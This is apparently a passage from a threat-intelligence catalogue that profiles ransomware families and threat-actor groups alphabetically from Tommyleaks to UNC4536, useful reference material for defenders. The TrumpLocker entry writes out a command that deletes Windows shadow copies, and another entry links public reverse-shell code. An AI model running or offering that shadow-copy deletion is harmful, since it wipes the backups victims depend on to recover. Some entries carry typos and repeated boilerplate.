Tommyleaks
Tommyleaks is an active extortion or ransomware group tracked by RansomLook.
TomNom
ransomware
tooda
Members:
Eco
Ego
emo
elo
user
Dante
Sevy
Torchwood
ransomware
TorLocker
ransomware
TorrentLocker
Ransomware Newer variants not decryptable. Only first 2 MB are encrypted
Tortoise
ransomware
Tortoiseshell
A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.
TotalWipeOut
ransomware
Toufan
Toufan is an active extortion or ransomware group tracked by RansomLook.
TowerWeb
Ransomware
TOXCAR CYBER TEAM
The Toxcar Cyber Team has claimed responsibility for a data leak involving Mastercard, asserting that the attack targeted the U.S. site and providing screenshots as purported evidence. They have also been linked to the sale of an undetectable ransomware designed to bypass major antivirus software. Additionally, the group has shared the source code of Elusive Stealer, a data theft malware. Their activities highlight a focus on data breaches and malware distribution within the cyber threat landscape.
Toxcrypt
Ransomware
TOXIC PANDA
A group targeting dissident groups in China and at the boundaries.
Toxic
Toxic is an active extortion or ransomware group tracked by RansomLook.
TPS1.0
ransomware
TRACER KITTEN
In April 2020, Crowstrike Falcon OverWatch discovered Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.
Tracfin
Tracfin
TraderTraitor
TraderTraitor targets blockchain companies through spear-phishing messages. The group sends these messages to employees, particularly those in system administration or software development roles, on various communication platforms, intended to gain access to these start-up and high-tech companies. TraderTraitor may be the work of operators previously responsible for APT38 activity.
TRAVELING SPIDER
Crowdstrike Tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed to take advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and send extortion-related emails using the victim’s own Microsoft Office 365 instance.
Trick-Or-Treat
ransomware
TridentLocker
TridentLocker is a ransomware group known for targeting organizations that manage high volumes of regulated or third-party data, including government services and telecom providers. They have claimed breaches of multiple victims, such as TMPartner, Sedgwick, and Advantage 360, often exfiltrating sensitive data before deploying ransomware. The group employs techniques such as stolen credentials, phishing, and exploitation of unpatched software to gain initial access and move laterally within networks. Their operations are characterized by high visibility postings on their leak portal, which include detailed victim profiles and countdown timers to create public pressure.
Trigona
Trigona is an active extortion or ransomware group tracked by RansomLook.
TRIPLESTRENGTH
TRIPLESTRENGTH is a financially motivated threat actor targeting cloud environments and on-premises infrastructures for cryptojacking, ransomware, and extortion. They exploit stolen credentials, cookies, and information stealer logs to gain unauthorized access to platforms like Google Cloud, AWS, and Microsoft Azure, deploying the unMiner application for cryptocurrency mining. Their ransomware operations utilize lockers such as Phobos, LokiLocker, and RCRU64, involving lateral movement and mass encryption. TRIPLESTRENGTH also engages in account hijacking and collaborates with partners for ransomware and blackmail operations, advertising their services in hacking-focused Telegram channels.
Tripoli
ransomware
Trisec
Trisec is an active extortion or ransomware group tracked by RansomLook.
Trojan Dz
CyberSplitter variant
Trojan-Syria
ransomware
Trojan
Ransomware
Troldesh orShade, XTBL
Ransomware May download additional malware after encryption
TrueCrypter
Ransomware
TrumpHead
ransomware
TrumpLocker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This is the old VenusLocker in disquise .To delete shadow files use the following commend: C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit https://2.bp.blogspot.com/-8qIiBHnE9yU/WK1mZn3LgwI/AAAAAAAAD-M/ZKl7_Iwr1agYtlVO3HXaUrwitcowp5_NQCLcB/s1600/lock.jpg
Try2Cry
ransomware
tssxx25
tssxx25 is an active extortion or ransomware group tracked by RansomLook.
Tstark
TStark is a threat actor identified by X-Ops, associated with a cluster of devices that executed the bookmark buffer overflow exploit targeting CVE-2020-15069 (T1203). The actor exhibited odd telemetry behavior indicative of intermittent VPN usage, switching between IP addresses geolocated to Hong Kong and Chengdu. Analysis revealed malware samples for Mac OS X and iOS, as well as IFRAME injection code exploiting a WebAssembly vulnerability (T1189). Additionally, TStark was linked to the development of libsophos.so and the deployment of malicious payloads across their devices.
Tuborg
Tuborg is an active extortion or ransomware group tracked by RansomLook.
Tumbleweed Typhoon
Microsoft threat actor profile. Origin/Threat: China.
TunnelSnake
The TunnelSnake campaign demonstrates the activity of a sophisticated actor that invests significant resources in designing an evasive toolset and infiltrating networks of high-profile organizations. By leveraging Windows drivers, covert communications channels and proprietary malware, the group behind it maintains a considerable level of stealth. That said, some of its TTPs, like the usage of a commodity webshell and open-source legacy code for loading unsigned drivers, may get detected and in fact were flagged by Kaspersky's product, giving them visibility into the group’s operation.
TurkHackTeam
Founded in 2004, Turkhackteam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteam’s forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.
Turkish Crypter
Turkish Crypter is an active extortion or ransomware group tracked by RansomLook.
Turkish FileEncryptor Ransomware
his is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Turkish Ransom
Ransomware
Turkish
Ransomware
TurkStatik
ransomware
TwoSail Junk
TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.
Tycoon
This malware is written in Java and is named after references in the code. Tycoon has been in the wild since December 2019 and has targeted organizations in the education, SMBs, and software industries. Tycoon is a multi-platform Java ransomware that targets Windows and Linux systems. This ransomware denies access to the system administrator following an attack on the domain controller and file servers. The initial intrusion occurs through an internet-facing remote desktop protocol (RDP) jump-server.
TYRANT
DUMB variant discovered on November 16, 2017. Disguised itself as a popular virtual private network (VPN) in Iran known as Psiphon and infected Iranian users. Included Farsi-language ransom note, decryptable in the same way as previous DUMB-based variants. Message requested only US$15 for unlock key. Advertised two local and Iran-based payment processors: exchange.ir and webmoney.ir.Shared unique and specialized indicators with RASTAKHIZ; iDefense threat intelligence analysts believe this similarity confirms that the same actor was behind the repurposing of both types of ransomware.
U Bomb
U Bomb is an active extortion or ransomware group tracked by RansomLook.
UAC-0006
UAC-0006 is a financially motivated threat actor that has been active since at least 2013. They primarily target Ukrainian organizations, particularly accountants, with phishing emails containing the SmokeLoader malware. Their goal is to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems.
UAC-0020
Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine's military and defense sectors.
UAC-0050
UAC-0050 is a threat actor that has been active since 2020, targeting government agencies in Ukraine. They have been distributing the Remcos RAT malware through phishing campaigns, using tactics such as impersonating the Security Service of Ukraine and sending emails with malicious attachments. The group has also been linked to other hacking collectives, such as UAC-0096, and has previously used remote administration tools like Remote Utilities. The motive behind their attacks is likely espionage.
UAC-0063
UAC-0063 is a threat actor linked to Russian APT28, known for targeting government entities in Ukraine and Central Asia for cyber espionage operations. They utilize keyloggers, backdoors, and malware like Hatvibe and Cherryspy to compromise systems and exfiltrate sensitive information. The group has been active since at least 2021 and has shown interest in targeting organizations in Mongolia, Kazakhstan, Kyrgyzstan, Israel, and India. Their TTPs include spear-phishing campaigns and exploiting vulnerabilities in software products like HFS HTTP File Server and Rejetto file-sharing servers.
UAC-0094
State Service of Special Communication and Information Protection of Ukraine spotted a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts. The Ukrainian CERT attributes the hacking campaign to threat actors tracked as UAC-0094. Threat actors are targeting Telegram users by sending Telegram messages with malicious links to the Telegram website in order to gain unauthorized access to the records and transfer a one-time code from SMS.
UAC-0098
UAC-0098 is believed to be an initial access broker who originally delivered malware like IcedID and Cobalt Strike for financial gain, but who has appeared to shift its operations to more politically aligned activity, such as compromising government, humanitarian, and non-profit organizations related to Ukraine and other European entities.[[Google TAG Ukraine IABs September 7 2022](/references/848da19d-b02d-4b78-b3c1-a72d5034fd45)]
UAC-0099
UAC-0099 is a threat actor that has been active since at least May 2023, targeting Ukrainian entities. They have been observed using a known WinRAR vulnerability to carry out attacks, indicating a level of sophistication. The actor relies on PowerShell and the creation of scheduled tasks to execute malicious VBS files for initial infection. Monitoring and limiting the functionality of these components can help mitigate the risk of UAC-0099 attacks.
UAC-0102
UAC-0102 is a threat actor group targeting UKR.NET users through phishing attacks. They distribute emails with HTML file attachments that redirect users to a fraudulent website to steal authentication data. Security teams can use Sigma rules to detect their phishing campaigns and leverage IOCs provided by CERT-UA to hunt for their activity in SIEM or EDR environments.
UAC-0118
From Russia with Love, is a threat actor group that emerged during the Russia-Ukraine war in 2022. They primarily engage in DDoS attacks and have targeted critical infrastructure, media, energy, and government entities. FRwL has been linked to the use of the Somnia ransomware, which they employ as a wiper rather than for financial gain. While there is no direct evidence linking FRwL to the Russian Main Intelligence Directorate, it is possible that they coordinate activities with state-aligned hacktivist groups.
UAC-0149
UAC-0149 is a threat actor targeting the Armed Forces of Ukraine with COOKBOX malware. They use obfuscation techniques like character encoding and base64 encoding to evade detection. The group leverages dynamic DNS services and Cloudflare Workers for their C2 infrastructure.
UAC-0154
UAC-0154 is a threat actor orchestrating the STARK#VORTEX phishing campaign, specifically targeting Ukraine’s military. They employ a Microsoft Help file containing obfuscated JavaScript as a lure, disguised as a manual for Pilot-in-Command Drones, to deliver the MerlinAgent malware. This PowerShell-based RAT is heavily obfuscated and downloads a payload from a remote server, enabling full control over compromised systems. The group initially targeted Ukrainian entities using military-themed documents sent via email to @ukr.net addresses.
UAC-0184
UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.
UAC-0185
UAC-0185 has been active since at least 2022, primarily targeting Ukrainian defense organizations through credential theft via messaging apps like Signal, Telegram, and WhatsApp, as well as military systems such as DELTA, TENETA, and Kropyva. The group employs phishing attacks, often impersonating the Ukrainian Union of Industrialists and Entrepreneurs (UUIE), to gain unauthorized access to the PCs of defense sector employees. They utilize custom tools, including MESHAGENT and UltraVNC, to facilitate their operations. Their activities are mapped to MITRE ATT&CK, focusing on tactics related to credential theft and remote access.
UAC-0194
UAC-0194 is a Russian threat actor linked to the exploitation of the Windows zero-day CVE-2024-43451, which was used in attacks against Ukrainian organizations. The group delivered phishing emails containing .url files that, when interacted with, exploited the vulnerability to facilitate the installation of additional payloads, including the SparkRAT trojan. They also exploited the Server Message Block protocol for NTLM hash exfiltration. CERT-UA has associated UAC-0194's activities with social engineering tactics to convince victims to execute malicious files.
UAC-0215
UAC-0215 is an APT group that has orchestrated a phishing campaign targeting public institutions, major industries, and military units in Ukraine, utilizing rogue RDP files to gain unauthorized access. The malicious emails are designed to appear legitimate, enticing recipients to open attachments that connect their systems to the attacker's server, allowing extensive access to local resources. CERT-UA has identified this activity as high-risk and has advised organizations to block RDP files at mail gateways and restrict RDP connection capabilities. The campaign's geographical footprint suggests a potential for broader cyberattacks beyond Ukraine.
UAC-0219
UAC-0219 is a hacking group observed conducting cyber-espionage operations targeting Ukrainian critical sectors, primarily utilising WRECKSTEEL malware for file exfiltration in both VBScript and PowerShell variants. Their activities focus on gathering intelligence from military innovation hubs, armed forces, law enforcement, and regional government institutions. CERT-UA has linked multiple cyber-attacks against government agencies and critical infrastructure in Ukraine to UAC-0219, emphasizing their reliance on specialized malware for sensitive information theft. The group’s operations are characterized by stealthy access and data exfiltration tactics, consistent with state-sponsored APT behavior.
UAC-0226
UAC-0226 is a cyber-espionage group targeting Ukrainian military, law enforcement, and local government entities—particularly near the eastern border—since February 2025. Initial access is achieved via phishing emails containing malicious .xlsm documents that decode and execute base64-encoded payloads stored in spreadsheet cells. Two main tools are used: a .NET-based reverse shell leveraging PowerShell code from a public GitHub repository (https://github.com/tihanyin/PSSW100AVB), and GIFTEDCROOK, a C/C++ stealer that extracts browser data (cookies, history, credentials), archives it with PowerShell, and exfiltrates via Telegram. The group often abuses compromised webmail accounts for delivery, underlining the importance of detailed email and web server logging. Their activity shows a mix of low development overhead and high operational targeting, consistent with state-aligned espionage.
UAC-0227
UAC-0227 is an APT group that has been active since at least March 2025, targeting local governments, critical infrastructure, and various organizations in the European Union. The group employs phishing campaigns that utilize SVG file attachments to distribute stealers like Amatera Stealer and Strela Stealer. Their tactics include leveraging ClickFix-style methods to implement their threats.
UAC-0239
UAC-0239 has been observed conducting spearphishing attacks targeting the Defence Forces and local state agencies of Ukraine, impersonating the Security Service of Ukraine. The group employs the OrcaC2 framework and FILEMESS stealer to compromise these organizations. Their campaigns often utilize themes related to "countering russian sabotage-reconnaissance groups" to disguise their malicious intent.
UAC-0241
UAC-0241 is a threat actor tracked by CERT-UA, active from May to November 2025, targeting educational institutions and government bodies in eastern Ukraine via spear-phishing emails from compromised Gmail accounts. These emails deliver password-protected ZIP archives with malicious LNK files that trigger an HTA → JavaScript → PowerShell chain, deploying credential harvester LaZagne, file-stealer scripts, and the Go-based GAMYBEAR backdoor for command execution, data exfiltration over HTTP, and persistence via registry Run keys. Initial access stemmed from a May 26 phishing spoofing a local emergency agency, with compromised systems exploited for lateral movement.
UAC-0245
Threat actors, tracked under the identifier UAC-0245 and targeting Ukraine, employ malicious XLL files disguised as critical documents.
UAT-10362
UAT-10362 is a threat actor identified by Cisco Talos, conducting spear-phishing campaigns targeting Taiwanese NGOs and suspected universities to deploy the malware "LucidRook." The malware features a multi-language modular design, layered anti-analysis capabilities, and stealth-focused payload handling. UAT-10362's operations rely on compromised or public infrastructure, indicating a mature level of operational tradecraft.
UAT-10608
UAT-10608 is a threat cluster observed by Cisco Talos conducting a large-scale, automated credential-harvesting campaign against public-facing web applications, especially Next.js deployments, using a custom framework called NEXUS Listener to extract and exfiltrate secrets such as credentials, SSH keys, cloud tokens, and API keys. The activity has been linked to broad opportunistic scanning and at least 766 compromised hosts across multiple regions and cloud providers.
UAT-5394
UAT-5394 is a state-sponsored North Korean threat actor known for developing the MoonPeak RAT, which is based on XenoRAT. They have transitioned from using QuasarRAT to MoonPeak and have established command and control infrastructure. UAT-5394 employs tactics such as using RDP for remote access and has implemented State Machines in their malware to complicate analysis. Their activity indicates a focus on rapidly evolving their malware and infrastructure to enhance operational capabilities.
UAT-5918
UAT-5918 is an APT group that targets entities in Taiwan, primarily in telecommunications, healthcare, and IT sectors, to establish long-term access for information theft. They exploit N-day vulnerabilities in unpatched web and application servers to gain initial access and utilize web shells, credential harvesting tools like Mimikatz and LaZagne, and red-teaming tools for post-compromise activities. UAT-5918 conducts network reconnaissance to pivot across endpoints, harvesting credentials and sensitive data, including database backups. Their operations show significant overlap with other APT groups in terms of TTPs and targeted industries.
UAT-6382
UAT-6382 is a Chinese-speaking threat actor that exploits CVE-2025-0944 to gain access to enterprise networks, particularly targeting local governing bodies in the U.S. They deploy web shells like AntSword and chinatso/Chopper on IIS web servers and utilize Rust-based loaders to implement Cobalt Strike and VSHell for persistent access. UAT-6382 employs custom tooling, such as TetraLoader, and conducts reconnaissance to identify and exfiltrate files of interest. Their VShell stager connects to a hardcoded C2 server and executes payloads in memory, indicating modifications made by the actor.
UAT-7237
UAT-7237 is a Chinese-speaking APT group that has been active since at least 2022, primarily targeting web infrastructure entities in Taiwan. They utilize a customized Shellcode loader known as “SoundBill” to execute shellcode, including Cobalt Strike payloads, and rely on SoftEther VPN clients and RDP for persistence and access. UAT-7237 employs techniques such as credential extraction using Mimikatz, reconnaissance with WMI-based tools, and selective deployment of web shells. Their operations indicate a focus on long-term persistence and stealth, with a preference for open-sourced and customized tooling.
UAT-8099
UAT-8099 is a Chinese-speaking cybercrime group primarily engaged in SEO fraud and the theft of high-value credentials, configuration files, and certificate data from vulnerable IIS servers. They utilize web shells and PowerShell to deploy the GotoHTTP tool for remote access, while also employing techniques such as DLL sideloading and RDP for persistence. The group has been observed using BadIIS variants for SEO manipulation and executing reconnaissance commands to gather system information. Additionally, they create hidden accounts and utilize VPN tools to maintain long-term access to compromised systems.
UAT-8302
UAT-8302 is a sophisticated China-nexus APT group targeting government entities in South America and southeastern Europe, deploying custom-made malware such as NetDraft, CloudSorcerer version 3, and VSHELL. They utilize tools like SNOWLIGHT and SNOWRUST for initial access and reconnaissance, employing techniques such as PowerShell scripts and SMB share discovery. UAT-8302 also establishes backdoor access through proxy servers and uses tools like Stowaway for tunneling traffic. Their operations indicate a close relationship with other known China-nexus threat actors, leveraging shared malware families and TTPs.
UAT-8616
UAT-8616 is a highly sophisticated cyber threat actor attributed by Cisco Talos, with evidence of activity dating back to at least 2023. They have been observed exploiting CVE-2026-20127 in the wild and previously exploited CVE-2022-20775 by escalating to root user access through a software version downgrade. Their operations indicate a focus on targeting network edge devices to establish persistent footholds in high-value organizations, including Critical Infrastructure sectors.
UAT-8837
UAT-8837 is a sophisticated China-linked APT group exploiting critical zero-day vulnerabilities, such as CVE-2025-53690 in the Sitecore platform, to achieve remote code execution and deploy the WeepSteel backdoor for espionage and data exfiltration. The group targets high-value enterprise and government sectors, focusing on public-facing applications to gain initial access and conducting stealthy reconnaissance. UAT-8837 employs techniques like privilege escalation by creating administrative accounts and is linked to targeted intrusions aimed at credential harvesting and internal reconnaissance.
UAT-9244
UAT-9244 is a China-nexus APT actor, disclosed by Cisco Talos on March 5, 2026, assessed with high confidence as closely associated with Famous Sparrow and overlapping with Tropic Trooper. Active since 2024, it exclusively targets South American telecommunication providers, deploying three novel cross-platform malware families: TernDoor (Windows backdoor with DLL side-loading and evasion driver), PeerTime (Linux/embedded backdoor using BitTorrent for resilient C2), and BruteEntry (GoLang scanner turning edge devices into Operational Relay Boxes for SSH/Postgres/Tomcat brute-force). The campaign enables persistent access, remote command execution, lateral movement, and infrastructure relay via unified C2 with shared SSL certificates and domains like bloopencil.net.
UAT-9686
UAT-9686 is a Chinese state-sponsored APT known for targeting networking infrastructure and edge appliances through a sophisticated espionage campaign. They exploit a critical flaw in the Cisco AsyncOS Spam Quarantine interface to gain root access and deploy custom malware, including AquaShell, along with Python scripts that execute natively. Their operations involve reverse tunneling and log purging, demonstrating a methodical approach to compromising communication infrastructure. Talos has observed overlaps in TTPs and tooling with other Chinese-nexus threat actors, indicating a consistent operational pattern.
UAT-9921
UAT-9921 is a China-nexus threat actor active since 2019, tracked by Cisco Talos. In 2026, they were observed deploying 'VoidLink', a sophisticated modular framework primarily targeting Linux systems (IoT, Critical Infrastructure). Unique characteristics include the use of AI-enabled IDEs for rapid development (ZigLang implant, GoLang backend), P2P mesh networking for C2, and advanced persistence via eBPF rootkits. They target Technology and Financial sectors exploiting Java serialization vulnerabilities (Apache Dubbo).
UCCU
ransomware
$ucyLocker
Ransomware
Uh-Oh
ransomware
Uiwix Ransomware
Using EternalBlue SMB Exploit To Infect Victims
Ukash
ransomware
Ukrainian Cyber Alliance
Cyber Alliance is a hacktivist group that has demonstrated capabilities in exploiting vulnerabilities, such as CVE-2023-22515 in Confluence, to escalate privileges and access targeted infrastructure. They successfully accessed Trigona's systems, exfiltrating sensitive data and ultimately defacing and deleting the organization's site.
Ultimo HT
ransomware
UltraCrypter
ransomware
UltraLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Based on the idiotic open-source ransomware called CryptoWire
UmbreCrypt
Ransomware CrypBoss Family
UnblockUPC
Ransomware
UNC1069
CryptoCore is a North Korean APT known for targeting cryptocurrency exchanges and financial institutions, employing spear-phishing techniques that lead to LONEJOGGER malware infections. The group has leveraged social engineering tactics, including deepfake technology and hijacked YouTube accounts, to execute sophisticated giveaway scams that deceive victims into sending cryptocurrencies. Their operations have involved the misuse of platforms like Gemini for reconnaissance and the development of fraudulent content. Additionally, CryptoCore has been linked to a variety of campaigns, including Dangerous Password and SnatchCrypto, focusing on financial gain through cryptocurrency theft.
UNC1549
UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.
UNC1860
UNC1860 is a persistent and opportunistic Iranian state-sponsored threat actor that is likely affiliated with Iran’s Ministry of Intelligence and Security (MOIS). A key feature of UNC1860 is its collection of specialized tooling and passive backdoors that Mandiant believes supports several objectives, including its role as a probable initial access provider and its ability to gain persistent access to high-priority networks, such as those in the government and telecommunications space throughout the Middle East.
UNC1878
UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.
UNC215
UNC215 is a Chinese nation-state threat actor that has been active since at least 2014. They have targeted organizations in various sectors, including government, technology, telecommunications, defense, finance, entertainment, and healthcare. UNC215 has been observed using tools such as Mimikatz, FOCUSFJORD, and HYPERBRO for initial access and post-compromise activities. They have demonstrated a focus on evading detection and have employed tactics such as using trusted third parties, minimizing forensic evidence, and incorporating false flags. UNC215's targets are located globally, with a particular focus on the Middle East, Europe, Asia, and North America.
UNC2447
UNC2447 is a financially motivated threat actor with ties to multiple hacker groups. They have been observed deploying ransomware, including FiveHands and Hello Kitty, and engaging in double extortion tactics. They have been active since at least May 2020 and target organizations in Europe and North America.
UNC2452
Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.
UNC2465
UNC2465 is a threat actor known for deploying the SMOKEDHAM .NET backdoor and DARKSIDE ransomware, utilizing TTPs such as phishing, Trojanized software installers, and supply chain attacks. They have employed the NGROK utility to expose internal services and facilitate lateral movement within victim environments. UNC2465 has also leveraged tools like UltraVNC, Cobalt Strike BEACON, and conducted credential harvesting via LSASS memory dumping. Their operations have included extortion tactics through a leaks website over TOR, applying pressure on victims by releasing stolen data.
UNC2565
UNC2565 is a threat group that has used the GOOTLOADER downloader to deliver Cobalt Strike BEACON. These intrusions have stemmed from victims accessing malicious websites that use SEO techniques to improve Google search rankings. After obtaining a foothold in the environment, UNC2565 has conducted reconnaissance and credential harvesting activity using common tools such as BLOODHOUND and KERBEROAST. UNC2565's motivations are currently unknown but overlaps with activity that has led to SODINOKIBI ransomware. This suggests that the threat group may be financially motivated.
UNC2630
UNC2630 is a threat actor believed to be affiliated with the Chinese government. They engage in cyber espionage activities, targeting organizations aligned with Beijing's strategic objectives. UNC2630 demonstrates advanced tradecraft and employs various malware families, including SLOWPULSE and RADIALPULSE, to compromise Pulse Secure VPN appliances. They also utilize modified binaries and scripts to maintain persistence and move laterally within compromised networks.
UNC2659
UNC2659 has been active since at least January 2021. We have observed the threat actor move through the whole attack lifecycle in under 10 days. UNC2659 is notable given their use of an exploit in the SonicWall SMA100 SSL VPN product, which has since been patched by SonicWall. The threat actor appeared to download several tools used for various phases of the attack lifecycle directly from those tools’ legitimate public websites.
UNC2717
UNC2717 is a threat actor that engages in espionage activities aligned with Chinese government priorities. They demonstrate advanced tradecraft and take measures to avoid detection, making it challenging for network defenders to identify their tools and intrusion methods. UNC2717, along with other Chinese APT actors, has been observed stealing credentials, email communications, and intellectual property. They have targeted global government agencies using malware such as HARDPULSE, QUIETPULSE, and PULSEJUMP.
UNC2814
UNC2814 is a suspected PRC-nexus cyber espionage group that has targeted telecommunications providers and government entities globally since at least 2017. The group employs the GRIDTIDE backdoor to blend malicious traffic with legitimate cloud API activity and utilizes living-off-the-land techniques, including SSH lateral movement and the creation of malicious systemd services. GTIG has confirmed 53 intrusions across 42 countries and identified suspected activity in at least 20 additional nations, with a focus on exfiltrating sensitive communications data. Google has taken significant disruption actions against UNC2814, including infrastructure takedowns and the release of IOCs to aid in detection.
UNC2970
UNC2970 is a North Korean threat actor that primarily targets organizations through spear-phishing emails with job recruitment themes, often utilizing fake LinkedIn accounts to engage victims. The group employs the PLANKWALK backdoor and other malware families, leveraging compromised WordPress sites for command and control. They have been observed using BYOVD techniques to exploit vulnerable drivers for evading detection. Mandiant has noted a shift in UNC2970's targeting strategy, including a focus on security researchers and advancements in their operational capabilities against EDR tools.
UNC3524
Mandiant observed this group operating since December 2019. Its techniques partially overlap with multiple Russian-based espionage actors (APT28 and APT29). They are described as having a high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet at their disposal.
UNC3569
China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.
UNC3784
UNC3784 is a suspected Chinese espionage actor, which - alongside other China-backed groups - was observed exploiting the "Follina" vulnerability (CVE-2022-30190) in zero-day attacks on organizations in Russia and Asia. UNC3784 specifically was observed deploying backdoor and downloader malware on compromised government networks in Southeast Asia.[[Mandiant M-Trends 2023](/references/fabb9f5c-3ce6-4eef-8711-13130ff41884)]
UNC3890
A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations, in a campaign stretching back to late 2020. Researchers believe that the data harvested during the campaign could be used to support various activities. UNC3890, the threat actor behind the attacks, deployed two proprietary pieces of malware – a backdoor named “SUGARUSH” and a browser credential stealer called “SUGARDUMP”, which exfiltrates password information to email addresses registered with Gmail, ProtonMail, Yahoo and Yandex email services. The threat actor also employs a network of C&C servers that host fake login pages impersonating legitimate platforms such as Office 365, LinkedIn and Facebook. These servers are designed to communicate with the targets and also with a watering hole hosted on the login page of a legitimate Israeli shipping company.
UNC3966
UNC3966 is a threat actor group tracked by Mandiant. In an intrusion documented in March 2023, UNC3966 received access to a victim network initially compromised by the group UNC961. UNC3966 primary motivations remain unclear. During the intrusion, the group was observed collecting and exfiltrating victim data. While a ransom note was also discovered, UNC3966 did not appear to deploy ransomware encryption software and did not appear to demand a ransom payment.[[Mandiant UNC961 March 23 2023](/references/cef19ceb-179f-4d49-acba-5ce40ab9f65e)]
UNC3973
UNC3973 is a financially motivated threat actor tracked by Mandiant, distinguished from the broader BASTA ransomware ecosystem (primarily tracked as UNC4393) due to its unique operational characteristics and TTPs. This actor has demonstrated a specific focus on supply chain compromises, as evidenced by their June campaign targeting credit unions in western Canada via a compromised managed service provider (MSP). UNC3973 leverages unauthorized service accounts with elevated privileges, specifically domain administrator accounts shared between the compromised MSP and the target organizations, to gain initial access.This actor's post-exploitation activity includes attempts to disable security controls and deploy the SYSTEMBC tunneler for command and control (C2) communication, followed by attempts to deploy BASTA ransomware. While their attempts to deploy both SYSTEMBC and BASTA have been observed, these were thankfully thwarted by endpoint security solutions in observed instances. The targeted, supply chain-enabled nature of UNC3973's intrusions, coupled with its use of privileged shared accounts and attempts at deploying BASTA, all suggest that it is an exclusive group, perhaps even affiliates working closely with or possibly operating under the direct control, BASTA ransomware operators. This group's ability to exploit centralized access points, like MSPs, represents a significant threat to organizations reliant on third-party providers.
UNC4191
UNC4191 is a China-linked threat actor that has been involved in cyber espionage campaigns targeting public and private sectors primarily in Southeast Asia. They have been known to use USB devices as an initial infection vector and have been observed deploying various malware families on infected systems. UNC4191's operations have also extended to the US, Europe, and the Asia Pacific Japan region, with a particular focus on the Philippines.
UNC4393
UNC4393 is a financially motivated threat actor primarily using BASTA ransomware. They have been active since early 2022 and have targeted over 40 organizations across various industries. UNC4393 has shown a willingness to cooperate with other threat clusters for initial access and has evolved from using existing tools to developing custom malware. They focus on efficient data exfiltration and multi-faceted extortion, often utilizing tools like COGSCAN and RCLONE for reconnaissance and data theft.
UNC4487
UNC4487 is a threat actor that targeted Ukrainian government officials by compromising a Ukrainian auto insurance website essential for official travel. This attack facilitated the distribution of the MATANBUCHUS malware, which was used to monetize access to infected systems. Mandiant later identified additional malware samples, referred to as ChillyHell, linked to UNC4487 through the reuse of a code signing certificate associated with MATANBUCHUS. The group's activities highlight a focus on exploiting critical infrastructure for financial gain.
UNC4536
